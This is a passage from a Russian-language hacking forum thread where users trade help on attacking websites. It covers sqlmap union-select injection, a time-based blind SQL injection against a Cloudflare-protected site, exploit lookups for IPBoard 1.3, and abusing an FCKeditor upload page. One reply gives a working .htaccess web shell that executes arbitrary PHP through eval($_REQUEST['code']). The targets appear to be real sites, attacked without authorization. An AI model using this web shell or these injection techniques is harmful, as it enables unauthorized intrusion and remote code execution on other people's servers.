А в чем профит этого запроса?
-
XSS.stack #1 – первый литературный журнал от юзеров форума
[web-hacking] Ваши вопросы
- Автор темы .Slip
- Дата начала
-
- Теги
- web-hacking
Очень похож на запрос сканера. Только то что автор прислал не весь запрос. Вообщем, в sqlmap так можно писать запрос, только не факт что он его воспримет. Там что-то типа того sqlmap site.ru/id=1 union select null,null{table}. Дальше надо гугл спрашивать
Все разобрался, это ко всему прочему оказалась фп, реакции на таймс нет
Да, это запрос сканера
Если что образайся, и лучше выкладывай полные запросы, что делал, что получал, линк и уязвимый параметр
Доброго времени суток, хотел поинтересоваться у знающих людей. Где можно почитать про реверс инжиниринг мобильных приложений? Если есть годные ссылки, статьи, туториалы, в том числе видео обучения буду очень рад!
В случае с ios (как и с android) вас интересует исследование бинарных приложений, работающих на ARM архитектуре процессоров, попытайтесь ознакомиться с материалами в этом направлении и с устройством таких процессоров.
Несколько полезных ссылок (направленных на RE ios приложений):
iOSGods
Level up your iOS and Android experience! Find tutorials, tools, support, hacks, mods, apps, games, and more. Your ultimate destination for mobile upgrades.
iosgods.com
iOSAppReverseEngineering/iOSAppReverseEngineering.pdf at master · iosre/iOSAppReverseEngineering
The world’s 1st book of very detailed iOS App reverse engineering skills :) - iosre/iOSAppReverseEngineering
github.com
На первое время этого будет достаточно.
Вероятнее всего всего вам помогут такие отладчики, как: ida pro, hopper disassembler (mac), binary ninja, radare2 (кроссплатформенный)
Последнее редактирование:
Может кто нибудь знает, есть ли открытые уязвимости у форума IPBoard v1.3?
https://sploitus.com/?query=IPB 1.3#exploits
и выбирай
Спасибо Bo0om'y за него, сам vulners выдаёт кучу шлака.
Мне было очень не удобно работать с vulners
Спасибо за хороший ресурс
Спасибо за хороший ресурс
Что значит эта ошибка?
Обычный баг приводящий к раскрытию путей, не более.
Однако, где .phtml там и .shtml может затереться, поэтому не забывай про SSI
Если конечно, продолжишь ковырять.что является лучшей альтернативой с открытым исходным кодом сканеру уязвимостей acunetix?
(en) what is the best open source alternative of accunetix web scanner?
(en) what is the best open source alternative of accunetix web scanner?
Google - php - fatal error
Самоптсный инструмент
Здравствуйте уважаемые юзеры, возник такой вопрос: есть заброшенный сайт, по всей видимости node.js+socket.io, dirbuster выдаёт 200 на любую ссылку, в силу своей неопытности не знаю за что взяться, пробовал играться burp'ом, получаю ответ в роде "ok",меняю "Traderequest" получаю code: 1 session unknown, так же получал {"found":false}, на сайте есть авторизация по steam api, return возвращает к главной странице авторизации не происходит. Была мысль сдекриптить socket session чтобы получить какие-то данные, но base64 помогать отказался, скорее всего посоленная сессия. Что можно сделать?
Столкнулся с проблемой.
Иммется ксореная таймс блинд скуля, все отлично, все раскручивается.
ssl подключен, вот при попытке получить имя бд происходит следующая ошибка
Сайт накрыт клаудом, при помощи тепера удалось обойти, но вот имена бд и кол-во не выдает.
При попытке получить имена бд используя http://... уже выдает кол-во бд и очень исковеркано information_schema, но дальше продвинуться не вышло
back-end DBMS: MySQL >= 5.0.12
Вопрос в том, как обойти ошибку ссл соединения?
Иммется ксореная таймс блинд скуля, все отлично, все раскручивается.
ssl подключен, вот при попытке получить имя бд происходит следующая ошибка
Код:
[08:29:40] [DEBUG] SSL connection error occurred for 'PROTOCOL_TLSv1_1' ('SSL EOF Error: EOF occurred in violation of protocol (_ssl.c:719)')
[08:30:10] [DEBUG] SSL connection error occurred for 'PROTOCOL_TLSv1_2' ('SSL EOF Error: EOF occurred in violation of protocol (_ssl.c:719)')Сайт накрыт клаудом, при помощи тепера удалось обойти, но вот имена бд и кол-во не выдает.
При попытке получить имена бд используя http://... уже выдает кол-во бд и очень исковеркано information_schema, но дальше продвинуться не вышло
back-end DBMS: MySQL >= 5.0.12
Вопрос в том, как обойти ошибку ссл соединения?
Последнее редактирование:
Вот первый вопрос к тебе) http://site.com/FCKeditor/editor/filemanager/upload/test.html есть такой эдитор, тут можно залить шелл, но файлы php он принимать отказывается. А другие файлы сохраняет в папку http://site.com/UserFiles/yad_num.txt , но открывать не хочет, думаю что прав нет. Что бы разрешить чтение для всех пользователей, нужно залить файл .htaccess с каким то содержимым.
подскажите что это за содержимое такое? allow from all пробовал.
подскажите что это за содержимое такое? allow from all пробовал.
Если прям .htaccess дает залить в текущую директорию (в чем я крайне сомневаюсь), так заливай сразу мини шелл:
Код:
<Files ~ "^\.ht">
Order allow,deny
Allow from all
</Files>
AddType application/x-httpd-php .htaccess
# <?php eval($_REQUEST['code']); ?>А вообще, смотри в сторону не что фильтруется, а что не фильтруется. Так быстрее поймешь стоит ли с ним возиться.
Merci pour le partage de base
Спасибо за ответ) не получилось правда(